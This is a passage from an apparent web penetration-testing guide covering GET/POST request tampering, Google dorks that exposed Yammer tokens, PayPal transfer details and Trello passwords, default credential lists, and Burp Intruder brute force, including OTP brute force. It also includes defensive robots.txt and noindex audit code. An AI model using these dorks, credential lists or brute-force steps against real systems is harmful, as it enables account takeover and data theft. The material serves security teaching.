When viewed in detail in an interceptor tool, these changes appear only in the URL, on the first line of the request. That first line is also the authoritative place to read the method: what the address bar shows is a rule of thumb, the request line is the fact.

Figure 59 Sample GET Request


When a link is static (does not change even though the input differs), it can be concluded that the request uses the POST method. The most frequently encountered example (though by no means the only one) is the login form of an application. When the user enters a username and password, the URL does not reflect them.

As an example, an application that can be tested is the login form at http://testphp.vulnweb.com/login.php ; enter an invalid username and password.

Figure 60 Sample Login Form using the POST Method

On each failure the link does not change, and on success the user is taken to a different dashboard page. However, when examined in detail in the interceptor tool, the username and password are indeed still present in the request, just not in the URL: they are carried in the request body.

Figure 61 Sample POST Request

In the course of testing, testers will certainly meet various forms of request, both GET and POST. In other situations they will also meet other methods such as PUT, DELETE, and more.
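As an added example (not from the original guide), the following Python code parses a raw request the way it appears in Burp's Intercept tab, pulls the user-controlled parameters from the query string (GET) or the URL-encoded body (POST), changes one of them and re-serializes the request with a corrected Content-Length. This is the manual edit-and-forward step from section 7.1, including the "buy a high credit value, pay a low price" check, done in code. The two requests are constructed for illustration; the purchase path and the parameter names are assumed, not captured from any real application.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Two constructed requests, written the way Burp's Proxy > Intercept shows them.
# The search request mirrors Figure 58/59 (parameters in the URL); the purchase
# request mirrors the credit-purchase flow of section 7.1 (parameters in the body).
GET_REQUEST = (
    "GET /search.php?test=query&searchFor=Insecure+Direct+Object+Reference HTTP/1.1\r\n"
    "Host: testphp.vulnweb.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)
POST_REQUEST = (
    "POST /purchase/confirm HTTP/1.1\r\n"
    "Host: pulsa.example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 32\r\n"
    "\r\n"
    "product_id=PULSA100&price=100000"
)


def parse_request(raw):
    """Split a raw HTTP/1.x request into method, path, version, headers and
    body, and collect user-supplied parameters from the query string (any
    method) and from the body when it is a URL-encoded form (the POST case)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip()] = value.strip()
    url = urlsplit(target)
    params = {"query": dict(parse_qsl(url.query, keep_blank_values=True)), "body": {}}
    if headers.get("Content-Type", "").startswith("application/x-www-form-urlencoded"):
        params["body"] = dict(parse_qsl(body, keep_blank_values=True))
    return {"method": method, "path": url.path, "version": version,
            "headers": headers, "body": body, "params": params}


def rebuild_request(req):
    """Serialize a parsed request back to raw text, recomputing the query
    string, the body and Content-Length from the (possibly edited) parameters.
    This is what the interceptor does when you edit a request and press Forward."""
    query = urlencode(req["params"]["query"])
    target = urlunsplit(("", "", req["path"], query, ""))
    headers = dict(req["headers"])
    body = req["body"]
    if req["params"]["body"]:
        body = urlencode(req["params"]["body"])
        headers["Content-Length"] = str(len(body.encode("utf-8")))
    lines = [f"{req['method']} {target} {req['version']}"]
    lines += [f"{name}: {value}" for name, value in headers.items()]
    return "\r\n".join(lines) + "\r\n\r\n" + body


def tamper(raw, name, value):
    """Change one parameter wherever it travels: in the body when the form
    carried it there, otherwise in the query string. Returns the new raw request."""
    req = parse_request(raw)
    where = "body" if name in req["params"]["body"] else "query"
    req["params"][where][name] = value
    return rebuild_request(req)


if __name__ == "__main__":
    print(parse_request(GET_REQUEST)["params"])
    print(parse_request(POST_REQUEST)["params"])
    # The section 7.1 check: does the server trust a client-supplied price?
    print(tamper(POST_REQUEST, "price", "1000"))
```

The point of recomputing Content-Length is practical: a body edited by hand without fixing that header is either truncated or rejected by the server, and the test result is then a transport error rather than a verdict on the application's logic.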


9. INFORMATION DISCLOSURE VIA SEARCH ENGINES

After understanding simple reconnaissance and the difference between the GET and POST methods, the discussion turns to combining the two in order to look for sensitive information that may exist in an application.

A simple question to open this discussion: "how exactly does a search engine collect (gather) its data?"

Quoting a simple article published by dummies.com, there are two general stages:

1. To meet the search engine's need to gather data, an automated process (known as spidering) continuously crawls the Internet. The goal is simple: to collect the data of web pages onto servers owned by the search engine.

The "spider" itself comes in many kinds, each belonging to its owner; for example Google's spider is known as Googlebot, Microsoft's as Bingbot, DuckDuckGo's as DuckDuckBot, and so on.

For information, in practice this spider is also known as a robot, bot, or crawler. For a search engine to index a new page or new data in an application takes time, which can reach several days (one factor being the level of visitor traffic to the data itself).

2. The second stage is to index all the data obtained in the first stage so that it becomes data that users can work with. For example, each vendor creates its own algorithm that decides which results are shown when a user searches for a certain keyword.

Looking at how search engines crawl the data present in an application, it is clear that the search engine "does not care" about the type of data. And this is what will be discussed as one way to obtain information (even sensitive information), namely by using search engines.


9.1. Technique Discussion - First Case - Yammer

In general, one cannot say in advance that a given application uses the GET method for a certain function, or the reverse. However, when data is passed using the GET method without protection against search engine crawlers, it is possible that the data can be retrieved from the search engine.

One interesting simple example is the issue on Yammer (Microsoft's social network for corporate/enterprise use) found in 2013. At that time, a researcher named Ateeq Khan found a vulnerability that allowed him to get into an account without having to know the username and password used by the victim.

Yes, the technique used is exactly the subject of this discussion. Ateeq took advantage of a misconfiguration in the Yammer application that did not prevent bots from crawling sensitive data passed in the GET method.

In short, Yammer has an API used to authorize a user to open messages. This API is accompanied by a parameter "access_token" that acts as the identity for authentication. Unfortunately, the API was not well protected, so with a few keywords in a search engine Ateeq managed to enumerate a number of access_token values, which of course let him log into each account that appeared in the search results.

For example, a user X has the access_token value NPLpzPsWdtCeXaKxBGA, generated automatically by Yammer. In order for user X to be authorized to open the messages that arrive, the user automatically obtains and visits a link carrying their access_token value:

https://www.yammer.com/api/v1/messages?access_token=NPLpzPsWdtCeXaKxBGA

When another user (say Z) also obtains that link, then automatically user Z can immediately get into user X's account.

The question then is, how did Ateeq get such links from the search engine?

Quite simply. Note that there is a parameter "access_token" in the link (URL). A tester can therefore use a "Google Dork" (discussed later) consisting of a search restricted to yammer.com links combined with a search for the keyword "access_token" in the URL. Here is the picture:


• The Google Dork "site:" restricts the search to information coming from the specified domain.

• The Google Dork "inurl:" searches for a specific keyword (exactly as written) in the URL of the results, whether or not the results are also restricted by a dork such as the "site:" operator.

Combined:

site:yammer.com AND inurl:'access_token'

In plain terms, the tester wants to find everything on yammer.com whose URL contains the parameter "access_token" (GET method).

Afterwards, Ateeq obtained several links from Google that could be visited directly. One of them was https://www.yammer.com/api/v1/messages?access_token=NPLpzPsWdtCeXaKxBGA .

When accessed, the response appears in the form of XML.

Figure 62 XML Displayed when Accessing the Link

What needs to be done to confirm this is to visit one of the links shown in the XML; the authorization of the user in question is then obtained automatically.


Figure 63 Accessing Another User's Account

In summary, without protection of data passed in this way, it is possible that a tester who can extract sensitive data from an application can then proceed to log in illegitimately (as in this example) or do other things. The root cause is a bearer credential placed in a URL: URLs end up in search indexes, browser history, server logs and Referer headers, so excluding crawlers alone is not a sufficient fix.

9.2. Google Dorks at a Glance

Quoting TechTarget, a Google Dork (sometimes simply "dork") is a search string used to perform an advanced search. Generally this is done to obtain results that are not normally visible in an application.

The same article says that users can find information that is hard to find (in general) just by entering a simple query.

"That description includes information that is not intended for public viewing but that has not been adequately protected."

As additional information, some simple operators that can be used in dorks are site and inurl (described previously), filetype, intext, and intitle (for example intitle:"index of" for open directory listings). To see more dorks useful for testing, testers can refer to the exploit-db.com site, which stores a lot of information in its "Google Hacking Database".


9.3. Technique Discussion - Second Case - PayPal

The second case discusses an issue similar to Yammer's, but at PayPal. Unlike Yammer, where a tester could get directly into someone's account, in this example, which occurred in 2017, one could only enumerate some general transaction data exchanged between users.

In general, when a PayPal user wants to send money to another user's account, PayPal sends several parameters packed in the GET method:

https://www.paypal.com/signin/?country.x=US&locale.x=en-US&returnUri=https://www.paypal.com/myaccount/transfer/send/external?recipient=(victim_email_address)&amount=1000.00&currencyCode=USD&payment_type=Gift&onboardData={"intent":"sendMoney","recipient":"(victim_email_address)","currency":"$","amount":"1000.00","redirect_url":"https://www.paypal.com/myaccount/transfer/send/external?recipient=(victim_email_address)&amount=1000.00&currencyCode=USD&payment_type=Gift","flow":"p2p","country":"US","locale":"en-US","sendMoneyText":"Custom message, for example is sending a money to victim_email_address"}

From this, some of the parameters passed are:

• recipient: the email address of the recipient of the money to be transferred

• amount: the value of the money to be sent

• currencyCode: the currency used

• payment_type: the type of payment, which can be a gift

• sendMoneyText: a text that can be used to give the recipient information about the transfer

Just as in the Yammer story, here the tester simply uses Google dorks to obtain information about transfers that "have happened" from one PayPal user to another.

A simple example:

site:paypal.com AND inurl:'payment_type='


site:paypal.com AND inurl:intent

site:paypal.com AND inurl:'sendMoneyText'

site:paypal.com AND inurl:'recipient='

site:paypal.com AND inurl:currencyCode=

site:paypal.com AND inurl:onboardData=

site:paypal.com AND inurl:sendMoney

site:paypal.com AND inurl:ITEM_NAME

site:paypal.com AND inurl:counterparty

For the record, whether the keyword is wrapped in single quotes, followed by an equals sign, or both, does not matter much; based on testing, each variant can yield different output.

Here is one example of execution with the keyword "sendMoneyText".

Figure 64 Trying to Retrieve Other Users' Information

And several outputs from a few experiments with different keywords:

Example enumeration with the keyword "recipient":

• recipient=board@silverxxxxxxxx.com; amount=325 USD; sendMoneyText=Sending board@silverxxxxxxxx.com; payment_type=Gift


• recipient=islandxxxxxxxxx@gmail.com; amount=10 USD; sendMoneyText=Sending islandxxxxxxxxx@gmail.com; payment_type=Gift

Example enumeration with the keyword "currencyCode":

• recipient=airxxxxx@xxxxx.com; amount=20 USD; sendMoneyText=Sending airxxxxx@xxxxx.com; payment_type=Gift

• recipient=hello@skyxxxxxxxxxxx.com; amount=245 USD; sendMoneyText=Sending hello@skyxxxxxxxxxxx.com; payment_type=Gift

Example enumeration with the keyword "recipient=" (with the equals sign):

• recipient=tablxxxxxxx@yahoo.com; amount=308 USD; sendMoneyText=Sending tablxxxxxxx@yahoo.com; payment_type=Gift

• recipient=dax@daxxxxxx.com; amount=30 USD; sendMoneyText=Sending dax@daxxxxxx.com; payment_type=Gift

Example enumeration with the keyword "sendMoneyText":

• paypalme=paypalme/xxxxxxxxx; amount=200 USD; sendMoneyText=You are sending Ahmed xxxxxxx US$200.00; locale=ar_EG

• paypalme=paypalme/xxxxxxx; amount=6 USD; sendMoneyText=You are sending Jatin xxxxx $6.00; locale=en_US

On a similar occasion, a way was also found to retrieve other users' invoices without any authentication or authorization:

Figure 65 Trying to Enumerate Invoices


Figure 66 Example of an Invoice Accessed

Thus it is shown that one can take (sensitive) data from an application that has not been configured correctly to prevent search engine bots from "crawling" it.
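For the Yammer and PayPal cases above, the check a practitioner wants to run against their own application, before a search engine does it for them, is: which URLs both carry sensitive GET parameters and are open to crawlers? The Python below is an added example, not part of this guide or of either disclosure; the URL list, the robots.txt and the parameter list are constructed (the first URL is the one quoted in the Yammer discussion), and in real use the URLs would come from the application's access logs or a crawl of the site.

```python
import urllib.robotparser
from urllib.parse import parse_qsl, urlsplit

# Parameter names whose values are credentials or personal data. Once a URL
# carrying them is crawled, the values sit in the search index (the Yammer
# access_token and the PayPal recipient/amount cases). Extend per application.
SENSITIVE_PARAMS = {"access_token", "token", "session", "sessionid", "password",
                    "recipient", "amount", "sendmoneytext", "onboarddata"}

# Constructed robots.txt for the target; not fetched from any real site.
SAMPLE_ROBOTS = """User-agent: *
Disallow: /myaccount/
"""

# Constructed URLs a crawler could reach. The first is the URL quoted in 9.1.
SAMPLE_URLS = [
    "https://www.yammer.com/api/v1/messages?access_token=NPLpzPsWdtCeXaKxBGA",
    "https://www.example.com/myaccount/transfer/send/external?recipient=a@b.test&amount=10",
    "https://www.example.com/signin/?returnUri=/myaccount/&recipient=a@b.test&amount=10",
    "https://www.example.com/search?q=invoice",
]


def sensitive_params_in(url):
    """Return the sensitive parameter names present in the URL's query string."""
    query = urlsplit(url).query
    return sorted({name for name, _ in parse_qsl(query, keep_blank_values=True)
                   if name.lower() in SENSITIVE_PARAMS})


def crawlable(url, robots_txt, user_agent="Googlebot"):
    """True when robots.txt does not exclude user_agent from url. Only the path
    and query are compared, which is how robots.txt rules are matched."""
    parser = urllib.robotparser.RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return parser.can_fetch(user_agent, url)


def indexable_secrets(urls, robots_txt):
    """URLs that carry sensitive GET parameters AND are open to crawlers:
    exactly the combination that the dorks in this chapter turn up."""
    findings = []
    for url in urls:
        params = sensitive_params_in(url)
        if params and crawlable(url, robots_txt):
            findings.append((url, params))
    return findings


if __name__ == "__main__":
    for url, params in indexable_secrets(SAMPLE_URLS, SAMPLE_ROBOTS):
        print(f"indexable with {', '.join(params)} in the URL: {url}")
```

Read the result carefully: the third sample URL is flagged even though /myaccount/ is disallowed, because the recipient and amount travel on the /signin/ redirect URL as well, which is the shape of the PayPal link quoted above. Also, robots.txt is a request to well-behaved crawlers, not an access control, and a URL that carries a token is copied into browser history, server logs and Referer headers regardless. The fix for findings like these is to move the secret out of the URL (a header or POST body, short-lived tokens) and to mark such responses noindex, not only to add a Disallow rule.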

9.4. Discussion Techniques - Third Case - Case Trello

In the third case, the discussion goes deeper into the use of a different Google dork. As seen in the two previous cases, the searches were carried out with the "inurl" dork, which means the search looks for specific keywords that might appear in a link (such as GET parameters).

But is it possible to search by checking the "body" or "content" of a site? The answer is yes. This was demonstrated by a researcher named Kushagra Pathak when he showed how to obtain "sensitive data" of Trello users using a simple Google dork.

The dork used is "intext", whose purpose is to find out whether the keywords entered appear in the body/content of a page on a portal. For example:


inurl:https://trello.com AND intext:@gmail.com AND intext:password

inurl:https://trello.com AND intext:ftp AND intext:password

inurl:https://trello.com AND intext:ssh AND intext:password

The explanation of each line is:

• The first line aims to find content containing passwords for accounts on the @gmail.com domain.

Figure 67 Information Disclosure via Google Dork - Intext Dork I

• The second and third lines aim to find content containing passwords for FTP services (left) and SSH (right).

Figure 68 Information Disclosure via Google Dork - Intext Dork II


On that occasion, Kushagra also carried out further searches and obtained other sensitive information, such as bug fixes inside a company as well as the passwords used to access many services such as admin panels and databases.

Figure 69 Information Disclosure via Google Dork - Bug Fixing

Figure 70 Information Disclosure via Google Dork - Sensitive Credentials I

Figure 71 Information Disclosure via Google Dork - Sensitive Credentials II


This shows and verifies that the information contained in the body/content of an application can be "traced" further with the right dork (as long as, of course, the application has not yet applied protection to the sensitive content in it, for example by not placing it behind a session).

9.5. Preventing Bots from Crawling Sensitive Content

For a directory, this can of course be "prevented" using robots.txt. However, using robots.txt is in itself no guarantee that bots will obey it and refrain from crawling.

Based on the information in the references on the robots.txt portal, in the FAQ (frequently asked questions) section "Can I block bad Robots?", it is disclosed that in practice it is difficult to prevent a "bad robot" from crawling:

"If the bad robot obeys /robots.txt, and you know the name it scans for in the User-Agent field, then you can create a section in your /robots.txt to exclude it specifically. But almost all bad robots ignore /robots.txt, making that pointless."

Nevertheless, it is still good enough for keeping out reputable search engines such as those of Google, Microsoft, and others.

Then, for pages reached via the GET method, Google has specifically stated that developers should add a "noindex" meta tag (on pages that are not blocked by robots.txt):

"Important! For the noindex directive to be effective, the page must not be blocked by a robots.txt file. If the page is blocked by a robots.txt file, the crawler will never see the noindex directive, and the page can still appear in search results, for example if other pages link to it."

Here is an example:

<meta name="robots" content="noindex">

In this way, developers prevent the majority of bots from indexing the content in their application.
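The caveat Google gives above (a noindex that sits behind a robots.txt block is never seen) is easy to get wrong, so here is an added example, not from the book, that audits the two mechanisms together. The robots.txt, the pages and the base URL example.test are constructed samples.

```python
"""Added example: check that pages meant to stay out of search results use
robots.txt and <meta name="robots" content="noindex"> consistently. A page that
is both blocked and tagged noindex is flagged: the crawler cannot fetch it, so
it never reads the directive and the URL may still be listed."""
import urllib.robotparser
from html.parser import HTMLParser

# Constructed robots.txt: /invoices/ is blocked for every crawler, /reports/ is not.
ROBOTS_TXT = """\
User-agent: *
Disallow: /invoices/
"""

# Constructed pages keyed by path; only some carry a noindex meta tag.
PAGES = {
    "/invoices/1001": '<html><head><meta name="robots" content="noindex"></head><body>invoice</body></html>',
    "/reports/q1": '<html><head><meta name="robots" content="noindex"></head><body>report</body></html>',
    "/public/about": "<html><head><title>About</title></head><body>hello</body></html>",
}


class _MetaRobots(HTMLParser):
    """Collects the directives of every <meta name="robots"> tag in a page."""

    def __init__(self):
        super().__init__()
        self.directives = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "meta":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("name", "").lower() == "robots":
            self.directives += [d.strip().lower() for d in a.get("content", "").split(",")]


def has_noindex(html):
    parser = _MetaRobots()
    parser.feed(html)
    return "noindex" in parser.directives


def classify(path, robots_txt, html, base="https://example.test"):
    """Combine the robots.txt verdict with the meta tag into one of four states."""
    rp = urllib.robotparser.RobotFileParser()
    rp.parse(robots_txt.splitlines())
    blocked = not rp.can_fetch("*", base + path)
    noindex = has_noindex(html)
    if blocked and noindex:
        return "misconfigured"  # crawler never sees the noindex; URL may still be listed
    if blocked:
        return "blocked-only"   # not crawled, but the URL can appear if linked elsewhere
    if noindex:
        return "noindex"        # crawled, directive read, page dropped from the index
    return "indexable"


def audit(robots_txt=ROBOTS_TXT, pages=PAGES):
    return {path: classify(path, robots_txt, html) for path, html in pages.items()}
```

Running audit() flags /invoices/1001 as misconfigured because the sensitive directory is blocked and also carries the tag that the crawler can no longer read.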


9.6. References on Information Disclosure via Search Engine

Here are a few references that can complete the explanation related to this discussion:

• How Search Engines Gather and Organize Data: https://www.dummies.com/web-design-development/search-engine-optimization/how-search-engines-gather-and-organize-data/

• Bot Directory: https://www.distilnetworks.com/bot-directory/category/search-engine/

• List All User Agents from Top Search Engines: https://perishablepress.com/list-all-user-agents-top-search-engines/

• Google Dork Query: https://whatis.techtarget.com/definition/Google-dork-query

• Google Hacking Database: https://www.exploit-db.com/google-hacking-database

• Block search indexing with 'noindex': https://support.google.com/webmasters/answer/93710

• Microsoft Yammer OAuth Token Bypass Vulnerability: https://www.vulnerability-db.com/?q=articles/2013/08/04/microsoft-yammer-%E2%80%93-oauth-bypass-token-vulnerability

• Information Disclosure at PayPal via Search Engine: http://firstsight.me/2017/12/information-disclosure-at-paypal-and-xoom-paypal-acquisition-via-search-engine/


ACCOUNT AND PASSWORD MECHANISM


10. BRUTE FORCE ATTACK - CHECK WEAK LOCK OUT MECHANISM

This section partly repeats some of the discussion already given in the "Summary of basic tests" earlier, this time equipped with the basic meaning and the techniques used.

10.1. Simple Meaning of Brute Force

Quoting the Kaspersky Resource Center, brute force is basically a "trial and error" attack that tries to obtain a valid value from a target, such as a username and password combination, a "hidden" directory in an application, or perhaps a key to decrypt a value.

Specifically, this attack is most often associated with "trial and error" on username and password combinations, making it possible for a tester to get into someone else's system.

10.2. Why Account and Password? - Google Case

The account and password are one of the main doors a tester (or an attacker in a real scenario) meets when faced with an application that is generally client-server (web, mobile, or desktop).

It is a reality that is hard to deny that there are still many developers/maintainers of systems who use weak accounts and passwords. The reasons vary, such as:

• A tight release schedule (so a weak account and password is used for easy management before release). Generally the manager intends to replace it once the asset is released (goes into production), but inadvertently does not. On the other hand, the absence of a control that forbids carrying all the dummy data from development into production is one of the factors that ultimately "supports" this issue.

• The difference in discipline and knowledge between developers/maintainers and testers. This is also commonplace because the mindset formed in each area is quite different. Generally, "support" in the form of a lack of security awareness can also leave developers/maintainers unaware of the risks they face when using a weak account or password.

With this vulnerability in hand, the tester is also one step closer to getting into the overall system.

In reality, the workflow/attack scenario can be developed further on sides such as:

• Web-based applications: issues such as File Upload, SQL Injection (when logged in) leading to the reading of sensitive files (when the database runs in a mode that can read files internally), and other similar issues that allow reading of, or communication with, data contained in the operating system.

• Desktop-based applications: in this situation, we can narrow it down to commonly found services as outlined above. The subsequent scenario can be, for example, reading sensitive files (via SSH/FTP/the like) that can be used to get into other assets contained in the system.

So, should this be a major concern for testers? The answer is yes, because even large companies can have such a problem. One of the most interesting examples is a write-up by a researcher named "Vishnu Prasad PG" on his Medium account. To keep it short, a few snippets of his writing are quoted below:

An HTTP login page appeared in front of me. Whoa! I never expected to see that!

So, there was a login in front of me, possibly the door to the inside of one of the most powerful companies in the world. However, I needed a username and password to get into it.

So, what do I do?

I tried clicking the LOGIN button without entering any credentials at all.

To my surprise, a page with many buttons and options appeared in front of me. It took me a minute to realize that I am inside a Google product's Admin Panel.

I am in!

It is noticeable that companies such as Google also have the potential for similar problems. It can therefore be concluded that, although simple, it would be wise not to let something like this escape the test being conducted.

10.3. Common Usernames and Passwords

In practice, there are several username and password combinations that are commonly used to log into systems. Some examples are as follows:


No. | Usernames | Passwords
1. | adm | all of the usernames listed, reused as the password
2. | admin | <blank password> / without password
3. | admin | P@ssw0rd (with upper- and lowercase P)
4. | administrator | P4ssw0rd (with upper- and lowercase P)
5. | 4dm1n | Passw0rd (with upper- and lowercase P)
6. | 4dm1n1str4t0r | Qwerty (with upper- and lowercase Q)
7. | root | 1qazxsw2 / zaq12wsx
8. | sa | 12345 (and combinations up to the number 0)
9. | business_name / street_name / app_name / department_name / pic_name | As well as the default passwords associated with the name of a specific product, such as those listed at https://cirt.net/passwords and http://www.phenoelit.org/dpl/dpl.html

10.4. Basic Brute Force Attack (Kinds of Brute Force Attack)

10.4.1. Basic Brute Force Attack Part I - Direct Attack on the Password

As a first step, this guide first discusses the basic steps for automating the input of various passwords.

As is known, a login form basically consists of fields for entering the username and password one owns. However, to perform brute force automatically, the tester needs tools such as the interceptor and forwarder in Burp Suite in order to first see the "pattern" that is sent.

In this section, the discussion focuses on brute force against the POST method (it is certainly no problem if a GET method is found instead).

As an experiment, access the link http://testphp.vulnweb.com/login.php again. After it opens, enter an arbitrary (invalid) password and pay special attention to what is captured in Burp Suite.


Figure 72 POST Method - Username and Password

From the picture, it appears that two parameters are passed (POST method) when a user is about to log in: the parameter "uname" as the marker of the username, and the parameter "pass" as the marker of the password.

Note that these parameter names can vary according to the development choices made by each programmer.

Once this pattern is obtained, "carry" the pattern to the Intruder (Send to Intruder) by right-clicking on the existing request.

Figure 73 "Send to Intruder"

Afterwards, go to the "Intruder" tab, which is fifth from the left in the Burp Suite version 1.7 used here. A simple view appears that does not need to be changed, because it is already taken automatically from the request "thrown" earlier from the proxy.


Figure 74 Intruder Menu - "Targets" Tab

The next thing to do is to select the "Positions" tab to set what is to be automated.

Figure 75 "Payload Positions"

On the "Payload Positions" tab, the tester is again confronted with several functions. On closer observation, some parameters are highlighted with a dollar symbol ($). In short, the $ marks what is to be automated.

A simple example from the image is the values of the uname and pass parameters wrapped in $$ (in this case $test$ and $password$). Why are the values "test" and "password"? Because both are the values entered when the form was tested the first time (remember the previous page).

To facilitate the test in this section, select "Clear $" first so that no parameter is highlighted with $ anymore.


Figure 76 Remove the Highlight with "Clear $"

After no parameter is highlighted anymore, now specify the parameter to be brute-forced. In this scenario, of course, the parameter in question is "pass".

Figure 77 Highlight Parameter "Pass"

If so, move on to the "Payloads" tab.

On this tab, several more features can be seen. Given that what is being discussed is the concept (not the tool), the discussion goes straight to the execution step.

In the "Payload Options", there is an empty field with the words "Enter a new item". Here, testers can manually enter, one by one, the words to be used as the dictionary.


Figure 78 Adding a "word" Manually

Words can also be added from a dictionary that is already available. For example, there is a file containing a "dictionary" of words that might be used as passwords. So, what needs to be done is to load this dictionary into the tool through the available "Load" button.

Figure 79 Adding a Password Automatically from a File


Automatically, all of the text contained in the file is entered into the list that will be "fired".

Figure 80 Password successfully Added

Note that each password must be separated by a line break.

Figure 81 Sample Files containing Password

When all this is done, the next thing is to run the attack by pressing the "Start Attack" button.

Figure 82 Starting Attack "Start Attack"

When the attack is carried out, Burp Suite automatically sends requests one after another according to the given password dictionary.


Figure 83 Auto Brute Force Attack

On the left, the attempts made from the earlier dictionary can be seen.

Then, how do we know whether an attempt has succeeded or failed?

A simple thing that can be checked to determine success or failure is the "response length". In the experiment, there are at least 10 (ten) requests that produce a similar response length, namely 221. Then in the 11th attempt, a significantly different response length appears, namely 5365.

From this situation, it can be concluded that the password entered in the 11th attempt is most likely correct.

Why "most likely"? Simply because it may instead be the response of an application that has implemented a restriction against brute-force attempts on a valid account, which differs from the failure response given while an account has not yet been blocked.

To be sure, the tester can immediately try logging into the portal manually, that is, with the username "test" and password "test".

Long story short, the tester will log in successfully, since the data is valid and there is no restriction on brute-force attempts.


Figure 84 Successful login on the results of Brute Force

10.4.2. Basic Brute Force Attack Part II - Page Redirection

There are times when an application does not directly return a different response when a valid username and password are entered. In this case, the application first responds with a redirect, and only then takes the user to the dashboard after login.

In this situation, the response value of the first request will always be the same, whether the account is valid or not.

A simple example is the application "Damn Vulnerable Web Application". By default, the account used to log into the web application is admin (username) and password (password). But when the brute-force attack is launched, the response length always stays at the same value, namely 435.

Figure 85 Username and Password is worth Valid


To anticipate this, the tester can use the "Redirections" feature in Burp Suite, available on the "Options" tab of the "Intruder".

With the same steps as mentioned earlier (i.e. determining the parameter to be brute-forced and entering the dictionary containing the list of passwords), continue by selecting the "Options" tab.

Figure 86 "Redirections" Options on the Burp Suite

After that, select "Always" under "Redirections". The simple purpose is for Burp Suite to process the follow-up request automatically when the initial response of an application requires the user to make a 2nd (or n-th) request in order to obtain the logged-in response.

When executed, the brute-force results reveal the differences:

Figure 87 Response after Set Page Redirection


As seen in the figure, there are two requests and two responses in the attack.

The details are roughly as shown in the following flow:

Figure 88 Sample Flow Simplified

• Request 1 contains the username and password;

• Response 1 contains a page redirection leading to Request 2;

• Request 2 has two possible conditions, namely obtaining a session because the login with valid credentials succeeded, or rejection for failing to enter valid credentials;

• Response 2 contains the view obtained depending on the condition of Request 2, namely the dashboard view after login (if the credentials are valid) or the login form again (if the credentials are invalid).

On closer inspection, there is a fairly significant difference between a failed attempt and a successful one, namely 1654 (for failed) and 4972 (for success).

Figure 89 Response Length - Failed and Success

Note that in reality, response lengths may differ even among attempts that all failed. But of course a reference point can still be drawn, for example by working within a certain range.

On the other hand, detection is made easier when there are hundreds or perhaps thousands of requests. Testers only need to use the "sort" available in the attack window and sort by "response length", either from large to small or from small to large (because there is no certainty that a successful login always gives a longer response than a failed login).

Figure 90 Click to Sort (click the column header for sorting)

Alternatively, the tester can check the "response body" that appears. For example, for each failed response the application gives the information "failed". Thus, testers only need to find the responses whose body does not contain the word "failed" (after sorting, of course, if there are hundreds or more attempts).

Figure 91 Example of Response Fail - Login Failed on the "Body"

Figure 92 Example of Failed Login - "Failed" at "Response Body"
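The analysis step of sections 10.4.1 and 10.4.2, as an added example that is not from the book: a constructed set of Intruder-style results (payload, chain of responses with redirects followed) is checked with both approaches, sorting by response length and looking for the "failed" marker in the body. The response bodies and lengths are constructed for illustration.

```python
"""Added example: classify constructed brute-force results the way the text
describes. With a redirect-based login the first hop is identical for every
payload, so only the final response is compared, by length and by a failure
marker in the body."""
from collections import Counter

# Constructed rows: (payload, [(status, body), ...]); the list is the chain of
# responses seen when Intruder follows redirects ("Redirections: Always").
RESULTS = [
    ("123456",   [(302, "Location: login.php"), (200, "<form>Login failed</form>" + "." * 100)]),
    ("qwerty",   [(302, "Location: login.php"), (200, "<form>Login failed</form>" + "." * 100)]),
    ("password", [(302, "Location: index.php"), (200, "<h1>Welcome to DVWA</h1>" + "." * 900)]),
    ("letmein",  [(302, "Location: login.php"), (200, "<form>Login failed</form>" + "." * 107)]),
]

FAIL_MARKER = "failed"


def final_response(chain):
    """The last hop of the chain, i.e. what the attack window shows after redirects."""
    return chain[-1]


def first_hop_lengths(results):
    """The page's point: without following redirects every length looks the same."""
    return {payload: len(chain[0][1]) for payload, chain in results}


def candidates_by_length(results):
    """Sort by final response length. The most common length is treated as the
    'failed' baseline; payloads outside a tolerance band around it are candidates
    that still need manual verification (a lockout page can also be an outlier)."""
    lengths = {payload: len(final_response(chain)[1]) for payload, chain in results}
    baseline = Counter(lengths.values()).most_common(1)[0][0]
    band = max(50, baseline // 10)  # tolerate small variations among failures
    ranked = sorted(lengths.items(), key=lambda kv: kv[1], reverse=True)
    return [payload for payload, n in ranked if abs(n - baseline) > band]


def candidates_by_marker(results, marker=FAIL_MARKER):
    """Keep payloads whose final body does NOT contain the failure marker."""
    return [payload for payload, chain in results
            if marker not in final_response(chain)[1].lower()]
```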


10.4.3. Basic Brute Force Attack Part III - Numbers as Payload - Facebook Case

In addition to dealing with characters such as uppercase and lowercase letters, there are times when brute force is also done with numbers. This generally occurs when trying to "get past" an OTP (One Time Password) feature that uses a number (e.g. four to six digits) on a portal.

One example of this is the situation in which a researcher named Anand Prakash managed to find an issue on Facebook, which had not limited brute-force attempts against the OTP feature applied on the beta.facebook.com and mbasic.beta.facebook.com portals.

On that occasion, Anand found that login on these portals was possible, but the OTP feature applied in them did not actually match the state of the main site (i.e. being limited when a certain number of failures is reached).

Long story short, by brute-forcing (payload: numbers) the parameter "n" until finding the value sent by Facebook to the victim's phone number, Anand was able to get into an account "protected" by the OTP feature.

POST /recover/as/code/ HTTP/1.1
Host: beta.facebook.com

lsd=AVoywo13&n=xXXXX

For this case, testers can again use Burp Suite.

With the same steps of intercepting the request, "throwing" it to "Intruder" mode and giving a "sign" (in the form of $$) to the parameter to be brute-forced, testers only need to change the "Payload Type" in the "Payload Sets" to "Numbers".

Figure 93 Changing the "Payload Type" to Numbers


Afterward, testers only need to enter the number range (from) and (to). The mode used is "Sequential", so brute force is carried out in order from the "from" value to the "to" value.

Figure 94 Inserting "Number Range" in the "Payload Options"

Without going over page redirection again (as discussed in the previous subsection), when all settings are complete, execute by choosing the "Start Attack" button.

Once executed, the brute-force process starts automatically as shown in the following picture.

Figure 95 Brute Force Attack - "Numbers" as Payloads

As outlined above, to make it easier to know whether an execution succeeded or not, the tester can sort by the existing response lengths.
